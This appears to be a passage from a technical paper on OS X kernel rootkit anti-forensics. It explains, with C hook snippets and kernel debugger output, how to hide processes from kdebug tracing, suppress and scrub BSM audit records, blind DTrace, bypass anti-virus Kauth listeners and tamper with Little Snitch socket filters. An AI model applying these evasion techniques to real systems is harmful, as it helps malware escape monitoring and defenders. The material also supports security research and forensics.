#define BSDDBG_CODE(SubClass, code) KDBG_CODE(DBG_BSD, SubClass, code)
Grep'ing XNU source code for BSDDBG_CODE will show where kdebug is implemented
in all BSD related functions. The fs_usage util traces the file system related
system calls (its source is located in system_cmds-550.10 package).
For example, it contains the following code for open() syscall:
#define BSC_open 0x040C0014
If we look at kdebug's include we have the following Class and SubClass codes:
#define DBG_BSD 4
#define DBG_BSD_EXCP_SC 0x0C /* System Calls */
Open is syscall #5 and it matches the code: (0x040C0014 & 0x3FFF) >> 2 = 0x5
Grep'ing for the DBG_BSD_EXCP_SC SubClass will land us into
bsd/dev/i386/systemcalls.c - the file that implements the C portion of syscalls
code. kdebug's tracing of syscalls entry and exit can be found at unix_syscall64
using two macros that call kernel_debug():
(int)(*ip), (int)(*(ip+1)), (int)(*(ip+2)), (int)(*(ip+3)), 0);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
error, uthread->uu_rval[0], uthread->uu_rval[1], p->p_pid, 0);
The easiest way to disable tracing of BSD related functions (besides patching
kernel_debug to just return) is to modify the calls to kernel_debug() and
reroute them to our own function. The disassembler makes this extremely easy, so
much that I implemented code for each call to kernel_debug() to have its own
trampoline (there is really no need for such thing!). Sample function to disable
all BSD syscall traces:
tfc_kernel_debug(uint32_t debugid, uintptr_t arg1, uintptr_t arg2, uintptr_t
arg3, uintptr_t arg4, __unused uintptr_t arg5)
// solve the symbol of the original function
static void (*_kernel_debug)(uint32_t debugid, uintptr_t arg1, uintptr_t arg2,
uintptr_t arg3, uintptr_t arg4, __unused uintptr_t arg5) = NULL;
if (_kernel_debug == NULL)
_kernel_debug = (void*)solve_kernel_symbol(&g_kernel_info, "_kernel_debug");
// do not let fs_usage/sc_usage trace any BSD* system calls
if ( (debugid >> 24) == DBG_BSD) return;
else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0);
This patch will be suspicious when fs_usage and/or sc_usage are used because no
BSD system calls will be traced and screen output will be very low. kdebug's
implementation poses some problems to distinguish between cases to hide or not.
Its buffers are very small and this is easily noticed if you peak at fs_usage or
sc_usage code (verify the lookup() [bsd/vfs/vfs_lookup.c] kernel function to see
how fs_usage gets the path name for syscalls such as open()).
Fortunately for us there is a easy way to accomplish this using current_proc() -
it returns a proc structure for the currently executing process. With this
information we can retrieve the process name from the proc structure (p_comm
field, max size 16) and match against the processes we do not want traced.
A code snippet for a simple check to hide vmware-tools-daemon:
struct proc *p = current_proc();
// MAXCOMLEN == 16, we could hash always to MAXCOMLEN to avoid strlen call
uint32_t hash = hash_name(&p->p_comm[0], strlen(&p->p_comm[0]));
static uint32_t hidehash = 0;
if (hidehash == 0) hidehash = hash_name("vmware-tools-daemon", MAXCOMLEN);
if (hash == hidehash ) return;
else _kernel_debug(debugid, arg1, arg2, arg3, arg4, 0);
The basic blocks to override kdebug are presented, implementation details are
left to the attached sample code and to you.
One final word of caution. The interception of Mach syscalls at kdebug gives
some problems and the hooking is very unstable (read kernel panics). This is
particularly exacerbated with the zombies rootkit feature later described. The
attached code has been written to support that feature but at time of writing I
still had no time to research the Mach problem - the code just ignores that
------[ 6.2.3 - TrustedBSD
TrustedBSD is a project that started in FreeBSD and was ported to OS X in
Leopard. It enables a series of (interesting) security features, the most famous
one being the OS X/iOS sandbox. Its implementation is done by adding "hooks" in
critical kernel functions. Policy modules can be written to receive events from
these "hooks" and act on them if necessary/desirable.
One easy application is to create a runtime file system checker for critical
folders. The app monitors LaunchDaemons and notify the user if a new file was
added in there, which is a not so frequent operation and a favourite spot for
malware to make itself persistent (oh, this was a good opportunity to use APT
buzzword!). It can be used for evil purposes - the same "hooks" can increase
privileges or hide files [25].
Using an example with the open syscall (to be used later with in Kauth section):
open() -> open_nocancel() -> open1()
vn_open_auth() -> vn_authorize_open_existing()
call policy, if registered
The vnode check handler that we can install has the following prototype:
typedef int mpo_vnode_check_open_t(
kauth_cred_t cred,
struct vnode *vp,
struct label *label,
int acc_mode);
Our handler will receive a pointer to the vnode structure and make it possible
to dump the filename and even transverse the full path (remember that vnodes
exist in a linked list).
MAC_CHECK() is a macro that will route the request to the policy modules. It is
a bit like sysent table where there is a list called mac_policy_list that holds
function pointers. A presentation by Andrew Case on Mac memory forensics [26]
analyses how to find malicious TrustedBSD modules using this list against a
sample I created (rex the wonder dog). It is worth to check his slides for other
Mac memory forensics tips.
The available policy checks can be found at bsd/security/mac_framework.h, and
their implementation is in the different source files in the same folder. What
interests us is that mac_* functions are always called so there is a
point of entry that can be used. The mac_* functions contain all the
necessary/available information since they are the ones always calling and
passing the parameters to the policy modules via MAC_CHECK() macro.
To attack this we can use the same old story: hook those functions, or attack
the mac_policy_list using the syscall handler concept, or something else.
When loading the rootkit it might also be useful to lookup the policy list to
verify if there is anything else installed other than default modules. The
system owner might be a bit smarter than the vast majority ;-).
------[ 6.2.4 - Auditing - Basic Security Module
The auditing features available from the Basic Security Module Implementation
are not really instrumentation but since their purpose is to track user and
process actions we should be interested in understanding and tweak them to our
evil purposes.
Auditing is not fully enabled by default due to its (potentially) considerable
performance hit and disk space usage (oh, I miss those PCI-DSS meetings).
To modify its configuration you need to edit /etc/security/audit_control. The
two interesting fields are flags and naflags (flags for events that can be
matched to a user, naflags for those who can't). Event classes are defined in
/etc/security/audit_class (description can be found at [27] and [28]). For
example, if "pc" class is configured audit will log exec() and its arguments.
Let's move to what really matters for us, evil stuff!
Auditing is implemented with macros [bsd/security/audit/audit.h] inside BSD and
Mach system calls (and some other places). The following code snippet is from
unix_syscall64 implementation, where entry and exit macros are placed before the
syscall function to be executed is called:
AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);
About the contents of entry macro:
* audit_syscall_enter() is called on entry to each system call. It is
* responsible for deciding whether or not to audit the call (preselection),
* and if so, allocating a per-thread audit record. audit_new() will fill in
* basic thread/credential properties.
The exit macro is the interesting one because it calls audit_syscall_exit():
* audit_syscall_exit() is called from the return of every system call, or in
* the event of exit1(), during the execution of exit1(). It is responsible
* for committing the audit record, if any, along with return condition.
When committed, the audit record will be added to an audit queue and removed
from the user thread structure (struct uthread, field uu_ar [bsd/sys/user.h]).
audit_syscall_exit(unsigned int code, int error, __unused proc_t proc,
struct uthread *uthread) {
audit_commit(uthread->uu_ar, error, retval);
uthread->uu_ar = NULL;
The commit function:
void audit_commit(struct kaudit_record *ar, int error, int retval) {
TAILQ_INSERT_TAIL(&audit_q, ar, k_q); // add to queue
cv_signal(&audit_worker_cv); // signal worker who commits to disk
By default in OS X, almost everything is disabled excepting logging and
authentication to obtain higher privileges. The command "praudit /dev/auditpipe"
(as root, of course) can be used to live audit events. Run the command and login
via ssh, or lock and unlock the console to see these events.
Syscall exit or audit commit functions can be temporarily patched to test if they
are the right places, and yes they are. Removing the call to audit_commit() or
patching it with a ret removes any trace of audit events in logs. There are four
references to commit in OS X 10.8.2 (3 calls, 1 jump):
- audit_syscall_exit
- audit_mach_syscall_exit
- audit_proc_coredump
- audit_session_event
To have granular control over the auditing process is a bit more complicated.
There is not always enough information available to distinguish between the
cases we want to hide at audit_commit(). For example, if process auditing is
enabled, the fork1() function calls audit like this:
AUDIT_ARG(pid, child_proc->p_pid);
This will call the function responsible to set the audit record field:
void audit_arg_pid(struct kaudit_record *ar, pid_t pid)
ar->k_ar.ar_arg_pid = pid;
The problem here is that we do not have (yet) enough information about this
fork; we are not sure (yet) if it is the process we want to hide or some other
process. A different tactic must be used! Because there is an events queue we
can hijack the worker responsible for those commits to disk, audit_worker()
The missing piece is how to correlate all events we are interested in. Luckily
for us (and the auditor in particular) there is a session id in audit record
structure [bsd/security/audit/audit_private.h]:
pid_t ar_subj_asid; /* Audit session ID */
With this information we just need to hold the queue commit to disk until enough
information to find the correct session ID is available. When we have it we can
edit the queue and remove all the entries that match that session ID.
Last but not least, there is a critical task left! Auditing logs must be cleaned
in case auditing was already properly configured. The bad news is that you will
have to do this dirty work yourself. Do not forget that the logs are in binary
format and OpenBSM's source at [29] can be helpful (praudit outputs XML format
so it might be a good starting point).
------[ 6.2.5 - DTrace
DTrace is a fantastic dynamic tracing framework introduced by Sun in Solaris and
available in Mac OS X since Leopard. It can be used to trace in real-time almost
every corner of kernel and user processes with minimum performance impact.
An experienced system administrator can use its power to assist in discovering
strange (aka malicious) behaviour. There are different providers that can trace
almost every function entry and exit, BSD syscalls and Mach traps, specific
process, virtual memory, and so on. The two most powerful providers against
rootkits are syscall and fbt (function boundary). We will see how they are
implemented and how to modify them to hide rootkit activity. A good design and
implementation overview is provided by [23] (Google is your friend) and usage
guide at [24].
------[ - syscall provider
This provider allows to trace every BSD system call entry and return (the
provider for Mach traps is mach_trap). A quick example that prints the path
argument being passed to the open() syscall:
# dtrace -n 'syscall::open:entry
printf("opening %s", copyinstr(arg0));
dtrace: description 'syscall::open:entry' matched 1 probe
0 119 open:entry opening /dev/dtracehelper
0 119 open:entry opening
0 119 open:entry opening /dev/tty
0 119 open:entry opening /etc/pf.conf
The syscall provider is useful to detect syscall handler manipulation but
not the function pointers modification at sysent table. To understand why let's
delve into its implementation.
This provider is implemented by rewriting the system call table when a probe is
enabled, which in practice is the same operation as sysent hooking. The
interesting source file is bsd/dev/dtrace/systrace.c. It contains a global
pointer called systrace_sysent - a DTrace related structure that will hold the
original system call pointer and some other info.
Things start happening at systrace_provide(). Here systrace_sysent is allocated
and all necessary information copied from the original sysent table
(systrace_init). Then internal DTrace probe information is added.
DTrace's philosophy is of zero probe effect when disabled so there are functions
that replace and restore the sysent table entries. There is a struct called
dtrace_pops_t which contains provider's operations. Syscall provider has the
static dtrace_pops_t systrace_pops = {
systrace_enable() will modify sysent function pointers and redirect them to
dtrace_systrace_syscall(). Code snippet responsible for this:
if (sysent[sysnum].sy_callc == systrace_sysent[sysnum].stsy_underlying)
vm_offset_t dss = (vm_offset_t)&dtrace_systrace_syscall;
ml_nofault_copy((vm_offset_t)&dss, (vm_offset_t)&sysent[sysnum].sy_callc,
Attaching a kernel debugger and inserting a breakpoint on systrace_enable()
confirms this (keep in mind all these values include ASLR slide of 0x24a00000):
gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent))
$12 = {
sy_narg = 0x3,
sy_resv = 0x0,
sy_flags = 0x0,
sy_call = 0xffffff8024cfc210, <- open syscall, sysent[5]
sy_arg_munge32 = 0xffffff8024fe34f0,
sy_arg_munge64 = 0,
sy_return_type = 0x1,
sy_arg_bytes = 0xc
dtrace_systrace_syscall is located at address 0xFFFFFF8024FDC630.
After enabling a 'syscall::open:entry' probe:
gdb$ print *(struct sysent*)(0xffffff8025255840+5*sizeof(struct sysent))
$13 = {
sy_narg = 0x3,
sy_resv = 0x0,
sy_flags = 0x0,
sy_call = 0xffffff8024fdc630, <- now points to dtrace_systrace_syscall
sy_arg_munge32 = 0xffffff8024fe34f0,
sy_arg_munge64 = 0,
sy_return_type = 0x1,
sy_arg_bytes = 0xc
To recall DTrace's flow:
User Kernel
open() -|-> unix_syscall64() -> dtrace_systrace_syscall -> open() syscall
What are the conclusions from all this? If only the sysent table function
pointers are modified by the rootkit, DTrace will be unable to directly detect
the rootkit using syscall provider. The modified pointer will be copied by
DTrace and return to it. DTrace is blind to the original function because it
does not exist anymore in the table, only inside our modified version.
If we modify the syscall handler as described in 2.6 and do not update the
sysent references in DTrace related functions then DTrace usage will signal the
potential presence of a rootkit. DTrace is still referencing the original sysent
table and will modify it but the syscall handler is not. The result is that
DTrace syscall provider will never receive any event. Conclusion: don't forget
to fix those references, although the functions that need to be patched are all
------[ - fbt provider
fbt stands for function boundary tracing and allows tracing function entry
and exit of almost all kernel related functions (there is a small list of
untraceable functions called critical_blacklist [bsd/dev/i386/fbt_x86.c]).
The possibilities to detect malicious code using this provider are higher due to
its design and implementation. An example using rubilyn rootkit is the best way
to demonstrate this:
#dtrace -s /dev/stdin -c "ls /"
/pid == $target/
Searching output for getdirentries64, without rootkit:
0 99661 unix_syscall64:entry
0 97082 kauth_cred_uthread_update:entry
0 91985 getdirentries64:entry
0 92677 vfs_context_current:entry
Now with rootkit loaded:
0 99661 unix_syscall64:entry
0 97082 kauth_cred_uthread_update:entry
0 2119 new_getdirentries64:entry <- hooked syscall!!!
0 91985 getdirentries64:entry <- original function
0 92677 vfs_context_current:entry
A very simple trace is able to detect both the hooked syscall and the call to
original getdirentries64. Houston, we have a rootkit problem!
DTrace's fbt design and implementation are very interesting so let me "briefly"
go thru it to find a way to hide the rootkit.
fbt's design is explained in [23]:
"On x86, FBT uses a trap-based mechanism that replaces one of the instructions
in the sequence that establishes a stack frame (or one of the instructions in
the sequence that dismantles a stack frame) with an instruction to transfer
control to the interrupt descriptor table (IDT).
The IDT handler uses the trapping instruction pointer to look up the FBT probe
and transfers control into DTrace. Upon return from DTrace, the replaced
instruction is emulated from the trap handler by manipulating the trap stack."
The source files we should focus on are bsd/dev/i386/fbt_x86.c and
DTrace's OS X implementation is done using an illegal instruction opcode, which
is (usually) patched into the instruction that sets the base pointer (EBP/RBP).
The instruction is emulated inside DTrace and not re-executed as it happens
in debuggers using int3 breakpoints.
Memory dump example with getdirentries64:
Before activating the provider:
gdb$ x/10i 0xFFFFFF8024D01C20
0xffffff8024d01c20: 55 push rbp
0xffffff8024d01c21: 48 89 e5 mov rbp,rsp
0xffffff8024d01c24: 41 56 push r14
0xffffff8024d01c26: 53 push rbx
# dtrace -n fbt::getdirentries64:entry
gdb$ x/10i 0xFFFFFF8024D01C20
0xffffff8024d01c20: 55 push rbp
0xffffff8024d01c21: f0 89 e5 lock mov ebp,esp <- patched
0xffffff8024d01c24: 41 56 push r14
0xffffff8024d01c26: 53 push rbx
The function that does all the work to find the patch location is
__provide_probe_64() [bsd/dev/i386/fbt_x86.c] (FBT_PATCHVAL defines the illegal
opcode byte).
Patching is done at fbt_enable() [bsd/dev/dtrace/fbt.c]:
if (fbt->fbtp_currentval != fbt->fbtp_patchval)
(vm_offset_t)fbt->fbtp_patchpoint, sizeof(fbt->fbtp_patchval));
fbt->fbtp_currentval = fbt->fbtp_patchval;
The following diagram shows the trap handling of the illegal instruction:
Activate fbt Provider
Invalid instruction
-------|-----------[ osfmk/x86_64/idt64.s ]
-------|-----------[ osfmk/i386/trap.c ]
-------|-----------[ bsd/dev/i386/fbt_x86.c ]
fbt_perfCallback() (...) .-> emulate -> continue
-------|-----------[ bsd/dev/dtrace/dtrace_subr.c ] | instruction
v |
dtrace_invop() |
-------|-----------[ bsd/dev/i386/fbt_x86.c ] |
v |
fbt_invop() |
-------|-----------[ bsd/dev/dtrace/dtrace.c ] |
v |
dtrace_probe() |
| |
v |
__dtrace_probe() |
| |
v |
(...) ---------------------------------------------´
Dtrace is activated inside kernel_trap():
if (__improbable(tempDTraceTrapHook != NULL)) {
if (tempDTraceTrapHook(type, state, lo_spp, 0) == KERN_SUCCESS) {
* If it succeeds, we are done...
#endif /* CONFIG_DTRACE */
tempDTraceTrapHook is just a function pointer, which in fbt provider case points
to fbt_perfCallback [bsd/dev/i386/fbt_x86.c].
The latter is responsible for calling the DTrace functionality and
emulating the patched instruction. The emulations depends on the type of patch
that was made - prologue (entry) or epilogue (return), and
which instruction was patched. These can be:
- Also NOPs used by the sdt provider (statically defined tracing)
This information is stored inside DTrace internal structures and returned by the
call to dtrace_invop():
emul = dtrace_invop(saved_state->, (uintptr_t *)saved_state,
It is not possible to just patch this call because the emul value determines the
type of emulation that needs to be executed after.
dtrace_invop is used by fbt and sdt providers and does nothing more than calling
function pointers contained in dtrace_invop_hdlr linked list
Continuing through the diagram...
fbt_invop is a good candidate to hijack and hide whatever we want from DTrace.
This can be done via a trampoline or modifying the function pointer contained
in dtrace_invop_hdlr list (symbol available in kernel).
From what I could test this list is initialised with the pointer to fbt_invop()
before any calls are made to fbt provider. In principle we can modify it without
waiting for initial DTrace execution.
int fbt_invop(uintptr_t addr, uintptr_t *state, uintptr_t rval)
fbt_probe_t *fbt = fbt_probetab[FBT_ADDR2NDX(addr)];
for (; fbt != NULL; fbt = fbt->fbtp_hashnext) {
if ((uintptr_t)fbt->fbtp_patchpoint == addr) {
if (fbt->fbtp_roffset == 0) {
x86_saved_state64_t *regs = (x86_saved_state64_t *)state;
CPU->cpu_dtrace_caller = *(uintptr_t
*)(((uintptr_t)(regs->isf.rsp))+sizeof(uint64_t)); // 8(%rsp)
/* 64-bit ABI, arguments passed in registers. */
dtrace_probe(fbt->fbtp_id, regs->rdi, regs->rsi, regs->rdx,
regs->rcx, regs->r8); // <---------- call to dtrace functionality --------
CPU->cpu_dtrace_caller = 0;
} else {
dtrace_probe(fbt->fbtp_id, fbt->fbtp_roffset, rval, 0, 0, 0);
CPU->cpu_dtrace_caller = 0;
return (fbt->fbtp_rval); <- the emul value
return (0);
fbt_invop finds probed address information stored in fbt_probetab array and
enters DTrace probe code. The return value that is needed for the emulation is
stored inside the structure.
To fiddle with DTrace we can emulate this function or create a modified
fbt_perfCallback, adding conditions to hide our own addresses. It contains no
private symbols so this is an easy task.
Next, is a potential implementation of a hooked fbt_perfCallback function.
Please notice that all the necessary code is not implemented. It is a mix of
code and "algorithms".
fbt_perfCallback_hooked(int trapno, x86_saved_state_t *tagged_regs,
uintptr_t *lo_spp, __unused int unused2)
kern_return_t retval = KERN_FAILURE;
x86_saved_state64_t *saved_state = saved_state64(tagged_regs);
if (FBT_EXCEPTION_CODE == trapno && !IS_USER_TRAP(saved_state))
uintptr_t addr = saved_state->;
// XXX: verify if we want to hide this address
// remember that addr here is where illegal instruction occurred
// so our list must contain that info
int addr_is_to_hide = hide_from_fbt(addr); // implement this
if (addr_is_to_hide)
// XXX: find fbt_probetab symbol here so we can use it next
// and now get the search starting point
fbt_probe_t *fbt = fbt_probetab[FBT_ADDR2NDX(addr)];
// find the structure for current addr
for (; fbt != NULL; fbt = fbt->fbtp_hashnext)
if ((uintptr_t)fbt->fbtp_patchpoint == addr)
// XXX: emulate all code inside fbt_perfCallback here
// except call to dtrace_invop()
// this is the code that is inside the first IF conditions
// in the original function
// a couple of symbols might need to be solved, easy!
// add fail case here ? shouldn't be necessary unless a big f*ckup
// occurs inside DTrace structures
// nothing to hide so call the original function
kern_return_t ret = KERN_FAILURE;
// XXX: don't forget we need to solve this symbol
ret = fbt_perfCallback(trapno, tagged-regs, lo_spp, unused2);
return ret;
return retval;
Functions that we want to hide from DTrace will never reach its probe system,
effectively hiding them. The performance impact should be extremely low unless
there are too many functions to hide, and hide_from_fbt() takes too long to
----[ 6.3 - AV-Monster II
AV-Monster is a (old, Feb'12) PoC that exploits the Kauth interface used by OS X
anti-virus solutions [21]. Pardon me for bringing an old subject to this paper
but it perfectly illustrates an attack on Kauth, and also because AV vendors, as
far as I know, did nothing or very little regarding this problem.
Apple recommends in [22] that anti-virus install Kauth listeners - they can
receive file events and pass them to the scan engine. The problem is that this
creates a single point of failure that we can (easily) exploit to bypass the
scan engine and remain undetectable (AV detection effectiveness discussion is
out of scope ;-)).
A very basic AV scanning workflow is:
Execute file -> Kauth generates event -> AV kext listener -> AV scan engine
It illustrates at least two distinct possibilities to *easily* bypass the
anti-virus. One is to patch Kauth and the other to patch the kext listener.
The old PoC code just NOPs the listener callback to render it inoperative - the
scanning engine stops receiving any events. This is too noisy! A stealth
implementation should just hijack that step and hide the files we want to, as it
is done with hiding files in the filesystem.
This time let me show you how to attack Kauth's. The example will be based on
the KAUTH_FILEOP_OPEN action and open() syscall. To avoid unnecessary browsing
of XNU sources, this is the worflow up to the interesting point:
open() -> open_nocancel() -> open1() [ bsd/vfs/vfs_syscalls.c ]
[ bsd/vfs/vfs_vnops.c ] vn_open_auth() -> vn_open_auth_finish()
[ bsd/kern/kern_authorization.c ] kauth_authorize_fileop()
listener callback
I do not want to spam you with code but allow me to reprint the fileop function:
kauth_authorize_fileop(kauth_cred_t credential, kauth_action_t action, uintptr_t
arg0, uintptr_t arg1)
char *namep = NULL;
int name_len;
uintptr_t arg2 = 0;
/* we do not have a primary handler for the fileop scope so bail out if
* there are no listeners.
if ((kauth_scope_fileop->ks_flags & KS_F_HAS_LISTENERS) == 0) {
if (action == KAUTH_FILEOP_OPEN || action == KAUTH_FILEOP_CLOSE ||
action == KAUTH_FILEOP_EXEC) {
/* get path to the given vnode as a convenience to our listeners. */
namep = get_pathbuff();
name_len = MAXPATHLEN;
if (vn_getpath((vnode_t)arg0, namep, &name_len) != 0) {
if (action == KAUTH_FILEOP_CLOSE) {
arg2 = arg1; /* close has some flags that come in via
arg1 */
arg1 = (uintptr_t)namep;
kauth_authorize_action(kauth_scope_fileop, credential, action, arg0,
arg1, arg2, 0);
if (namep != NULL) {
The purpose of this function is to retrieve some useful data to the listener. In
this case it is the vnode reference of the file and its full path.
Apple's documentation confirms it:
KAUTH_FILEOP_OPEN — Notifies that a file system object (a file or directory) has
been opened. arg0 (of type vnode_t) is a vnode reference. arg1 (of type (const
char *)) is a pointer to the object's full path.
It is clear now that this is a great place to hijack and hide files we do not
want the AV to scan (or some other listener - this is also a good feature for a
file monitor). We just need to verify if current file matches our list and
return 0 if positive, else call the original code (all these functions are not
static so we can easily find the symbols).
And that's it. Simple, uh? :-)
----[ 6.4 - Little Snitch
Little Snitch is a popular application firewall that can blow up the rootkit
cover if network communications are needed and its not taken care of (nobody
likes a snitch!). Socket filters is the OS X feature that enables Little Snitch
to easily intercept and control (network) sockets without need for hooking or
any other (unstable/dubious) tricks. They can filter inbound or outbound traffic
on a socket and also out-of-band communication [17].
The installation of a socket filter is done using the sflt_register() function,
for each domain, type, and protocol socket. Little Snitch loops to install the
filter in all possible socket combinations.
extern errno_t sflt_register(const struct sflt_filter *filter,
int domain,
int type,
int protocol);
The interesting detail of sflt_register() is the sflt_filter structure
[bsd/sys/kpi_socketfilter.h]. It contains a series of callbacks for different
socket operations:
struct sflt_filter {
sflt_handle sf_handle;
int sf_flags;
char *sf_name;
sf_unregistered_func sf_unregistered;
sf_attach_func sf_attach; // handles attaches to sockets.
sf_detach_func sf_detach;
sf_notify_func sf_notify;
sf_getpeername_func sf_getpeername;
sf_getsockname_func sf_getsockname;
sf_data_in_func sf_data_in; // handles incoming data.
sf_data_out_func sf_data_out;
sf_connect_in_func sf_connect_in; // handles inbound connections.
sf_connect_out_func sf_connect_out;
sf_bind_func sf_bind; // handles binds.
History repeats itself and once again the easiest way is to hook the function
pointers and do whatever we want. Little Snitch driver (it's an I/O Kit driver
and not a kernel extension) loads very early so hooking sflt_register() and
modifying the structure on the fly is not very interesting. We need to lookup
the structure in kernel memory and modify it.
Many different socket filters can be attached to the same socket so there must
be a data structure holding this information. The interesting source file is
bsd/kern/kpi_socketfilter.c, where a tail queue is created and referenced using
a static variable sock_filter_head.
struct socket_filter {
TAILQ_ENTRY(socket_filter) sf_protosw_next;
TAILQ_ENTRY(socket_filter) sf_global_next;
struct socket_filter_entry *sf_entry_head;
struct protosw *sf_proto;
struct sflt_filter sf_filter;
u_int32_t sf_refcount;
TAILQ_HEAD(socket_filter_list, socket_filter);
static struct socket_filter_list sock_filter_head;
There are a few functions referencing sock_filter_head and the disassembler can
be helpful to find the correct location (sflt_attach_internal() is a good
candidate). Using gdb attached to kernel and sock_filter_head address:
gdb$ print *(struct socket_filter_list*)0xFFFFFF800EAAC9F8
$1 = {
tqh_first = 0xffffff8014811f08,
tqh_last = 0xffffff8014898e18
(sock_filter_head located at 0xFFFFFF80008AC9F8 in 10.8.2 plus KASLR of
0xe200000 in this example)
Iterating around the tail queue we find the Little Snitch socket filter:
gdb$ print *(struct socket_filter*)0xffffff801483e608
$7 = {
sf_protosw_next = {
tqe_next = 0x0,
tqe_prev = 0xffffff8014811f08
sf_global_next = {
tqe_next = 0xffffff801483e508,
tqe_prev = 0xffffff801483e718
sf_entry_head = 0xffffff801b29a1c8,
sf_proto = 0xffffff800ea2bca0,
sf_filter = {
sf_handle = 0x27e3ea,
sf_flags = 0x5,
sf_name = 0xffffff7f8eb1357b "at_obdev_ls",
sf_unregistered = 0xffffff7f8eb0938f,
sf_attach = 0xffffff7f8eb093f9,
sf_detach = 0xffffff7f8eb09539,
sf_notify = 0xffffff7f8eb095e8,